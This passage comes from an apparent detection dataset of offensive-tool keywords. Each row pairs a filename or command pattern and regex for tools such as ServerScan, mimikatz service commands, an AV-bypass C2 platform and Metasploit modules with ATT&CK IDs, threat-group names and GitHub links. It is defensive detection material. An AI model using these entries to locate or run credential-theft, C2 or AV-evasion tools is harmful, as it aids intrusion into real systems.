T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Adminisme/ServerScan","1","1","N/A","10","10","1502","215","2022-06-28T08:27:39Z","2020-04-03T15:14:12Z" "*serverScan.win.cna*",".{0,1000}serverScan\.win\.cna.{0,1000}","offensive_tool_keyword","cobaltstrike","ServerScan is a high-concurrency network scanning and service detection 
tool developed in Golang.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Adminisme/ServerScan","1","1","N/A","10","10","1502","215","2022-06-28T08:27:39Z","2020-04-03T15:14:12Z" "*serverscan_386.exe*",".{0,1000}serverscan_386\.exe.{0,1000}","offensive_tool_keyword","cobaltstrike","ServerScan is a high-concurrency network scanning and service detection tool developed in Golang.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 
- TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Adminisme/ServerScan","1","1","N/A","10","10","1502","215","2022-06-28T08:27:39Z","2020-04-03T15:14:12Z" "*ServerScan_Air_*.exe*",".{0,1000}ServerScan_Air_.{0,1000}\.exe.{0,1000}","offensive_tool_keyword","cobaltstrike","ServerScan is a high-concurrency network scanning and service detection tool developed in Golang.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Adminisme/ServerScan","1","1","N/A","10","10","1502","215","2022-06-28T08:27:39Z","2020-04-03T15:14:12Z" "*ServerScan_Air_*_amd64*",".{0,1000}ServerScan_Air_.{0,1000}_amd64.{0,1000}","offensive_tool_keyword","cobaltstrike","ServerScan is a high-concurrency network scanning and service detection tool developed in 
Golang.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Adminisme/ServerScan","1","1","N/A","10","10","1502","215","2022-06-28T08:27:39Z","2020-04-03T15:14:12Z" "*ServerScan_Air_*_i386*",".{0,1000}ServerScan_Air_.{0,1000}_i386.{0,1000}","offensive_tool_keyword","cobaltstrike","ServerScan is a high-concurrency network scanning and service detection tool developed in Golang.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - 
TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Adminisme/ServerScan","1","1","N/A","10","10","1502","215","2022-06-28T08:27:39Z","2020-04-03T15:14:12Z" "*serverscan_air-probes.exe*",".{0,1000}serverscan_air\-probes\.exe.{0,1000}","offensive_tool_keyword","cobaltstrike","ServerScan is a high-concurrency network scanning and service detection tool developed in Golang.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Adminisme/ServerScan","1","1","N/A","10","10","1502","215","2022-06-28T08:27:39Z","2020-04-03T15:14:12Z" "*serverscan_amd64.exe*",".{0,1000}serverscan_amd64\.exe.{0,1000}","offensive_tool_keyword","cobaltstrike","ServerScan is a high-concurrency network scanning and service detection tool developed in Golang.","T1548.002 - 
T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Adminisme/ServerScan","1","1","N/A","10","10","1502","215","2022-06-28T08:27:39Z","2020-04-03T15:14:12Z" "*ServerScan_Pro_*.exe*",".{0,1000}ServerScan_Pro_.{0,1000}\.exe.{0,1000}","offensive_tool_keyword","cobaltstrike","ServerScan is a high-concurrency network scanning and service detection tool developed in Golang.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 
- TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Adminisme/ServerScan","1","1","N/A","10","10","1502","215","2022-06-28T08:27:39Z","2020-04-03T15:14:12Z" "*ServerScan_Pro_*_amd64*",".{0,1000}ServerScan_Pro_.{0,1000}_amd64.{0,1000}","offensive_tool_keyword","cobaltstrike","ServerScan is a high-concurrency network scanning and service detection tool developed in Golang.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Adminisme/ServerScan","1","1","N/A","10","10","1502","215","2022-06-28T08:27:39Z","2020-04-03T15:14:12Z" "*ServerScan_Pro_*_i386*",".{0,1000}ServerScan_Pro_.{0,1000}_i386.{0,1000}","offensive_tool_keyword","cobaltstrike","ServerScan is a high-concurrency network scanning and service detection tool developed in Golang.","T1548.002 - T1548.003 - 
T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Adminisme/ServerScan","1","1","N/A","10","10","1502","215","2022-06-28T08:27:39Z","2020-04-03T15:14:12Z" "*serverscan64 *",".{0,1000}serverscan64\s.{0,1000}","offensive_tool_keyword","cobaltstrike","ServerScan is a high-concurrency network scanning and service detection tool developed in Golang.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - 
TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Adminisme/ServerScan","1","0","N/A","10","10","1502","215","2022-06-28T08:27:39Z","2020-04-03T15:14:12Z" "*serverscan64 *tcp*",".{0,1000}serverscan64\s.{0,1000}tcp.{0,1000}","offensive_tool_keyword","cobaltstrike","ServerScan is a high-concurrency network scanning and service detection tool developed in Golang.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Adminisme/ServerScan","1","0","N/A","10","10","1502","215","2022-06-28T08:27:39Z","2020-04-03T15:14:12Z" "*serverscan86 *",".{0,1000}serverscan86\s.{0,1000}","offensive_tool_keyword","cobaltstrike","ServerScan is a high-concurrency network scanning and service detection tool developed in Golang.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - 
T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Adminisme/ServerScan","1","0","N/A","10","10","1502","215","2022-06-28T08:27:39Z","2020-04-03T15:14:12Z" "*Server-Side-Request-Forgery-Payloads.*",".{0,1000}Server\-Side\-Request\-Forgery\-Payloads\..{0,1000}","offensive_tool_keyword","Offensive-Payloads","List of payloads and wordlists that are specifically crafted to identify and exploit vulnerabilities in target web applications.","T1210 - T1185 - T1059 - T1400 - T1506 - T1213 ","TA0001 - TA0002 - TA0009","N/A","N/A","List","https://github.com/InfoSecWarrior/Offensive-Payloads/","1","1","N/A","N/A","2","161","65","2023-12-12T08:32:23Z","2022-11-18T09:43:41Z" "*service/executable/",".{0,1000}service\/executable\/","offensive_tool_keyword","C2 related tools","An anti-virus platform written in the Golang-Gin framework with built-in BypassAV methods such as separation and bundling.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - 
T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","N/A","C2","https://github.com/Ed1s0nZ/cool","1","1","N/A","10","10","683","115","2023-07-13T07:04:30Z","2021-11-10T14:32:34Z" "*service/executable/compile.exe*",".{0,1000}service\/executable\/compile\.exe.{0,1000}","offensive_tool_keyword","C2 related tools","An anti-virus platform written in the Golang-Gin framework with built-in BypassAV methods such as separation and bundling.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","N/A","C2","https://github.com/Ed1s0nZ/cool","1","1","N/A","10","10","683","115","2023-07-13T07:04:30Z","2021-11-10T14:32:34Z" "*service::me*",".{0,1000}service\:\:me.{0,1000}","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. 
pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","0","N/A","10","10","18741","3563","2024-01-05T09:06:47Z","2014-04-06T18:30:02Z" "*service::preshutdown*",".{0,1000}service\:\:preshutdown.{0,1000}","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","18741","3563","2024-01-05T09:06:47Z","2014-04-06T18:30:02Z" "*service::remove*",".{0,1000}service\:\:remove.{0,1000}","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. 
keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","18741","3563","2024-01-05T09:06:47Z","2014-04-06T18:30:02Z" "*service::resume*",".{0,1000}service\:\:resume.{0,1000}","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","18741","3563","2024-01-05T09:06:47Z","2014-04-06T18:30:02Z" "*service::shutdown*",".{0,1000}service\:\:shutdown.{0,1000}","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. 
keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","18741","3563","2024-01-05T09:06:47Z","2014-04-06T18:30:02Z" "*service::start*",".{0,1000}service\:\:start.{0,1000}","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","18741","3563","2024-01-05T09:06:47Z","2014-04-06T18:30:02Z" "*service::stop*",".{0,1000}service\:\:stop.{0,1000}","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. 
keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","18741","3563","2024-01-05T09:06:47Z","2014-04-06T18:30:02Z" "*service::suspend*",".{0,1000}service\:\:suspend.{0,1000}","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","18741","3563","2024-01-05T09:06:47Z","2014-04-06T18:30:02Z" "*service_permissions_escalate.rb*",".{0,1000}service_permissions_escalate\.rb.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a 